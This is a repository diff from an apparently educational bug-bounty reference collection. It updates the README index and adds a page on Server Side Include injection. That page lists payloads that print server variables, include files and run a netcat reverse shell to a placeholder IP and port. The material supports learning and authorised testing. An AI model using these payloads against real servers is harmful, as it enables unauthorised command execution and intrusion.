🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 17 lines
    18 18  - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
    19 19  - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
    20 20  - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md)
    21  -- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
     21 +- [NoSQL Injection (NoSQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
    22 22  - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
    23 23  - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
    24 24  - [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
     25 +- [Server Side Include Injection (SSI Injection)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Include%20Injection.md)
    25 26  - [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
    26  -- SQL Injection (SOON)
     27 +- [SQL Injection (SQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/SQL%20Injection.md)
    27 28  - [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
    28 29  - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
    29  - 
    30  -## Checklist
    31  -- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
    32  -- Register Functionality SOON!
    33 30   
    34 31  ## List Bypass
    35 32  - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
    36 33  - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
    37 34  - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
    38 35  - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
     36 + 
     37 +## Checklist
     38 +- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
     39 +- Register Functionality SOON!
     40 + 
     41 +## CVEs
     42 +- CVEs 2021 (https://github.com/daffainfo/AllAboutBugBounty/blob/master/CVEs/2021)
     43 +- CVEs 2022 (SOON)
     44 +- CVEs 2023 (SOON)
    39 45   
    40 46  ## Miscellaneous
    41 47  - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
    skipped 32 lines
  • ■ ■ ■ ■ ■ ■
    Server Side Include Injection.md
     1 +# Server Side Include Injection (SSI Injection)
     2 + 
     3 +## Introduction
     4 +SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
     5 + 
     6 +## Where to find
     7 +Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
     8 + 
     9 +## How to exploit
     10 +1. Print a date
     11 +```
     12 +<!--#echo var="DATE_LOCAL" -->
     13 +```
     14 + 
     15 +2. Print all the variabels
     16 +```
     17 +<!--#printenv -->
     18 +```
     19 + 
     20 +3. Include a file
     21 +```
     22 +<!--#include file="includefile.html" -->
     23 +```
     24 + 
     25 +4. Doing a reverse shell
     26 +```
     27 +<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
     28 +```
     29 + 
     30 +## References
     31 +* [OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
Please wait...
Page is in error, reload to recover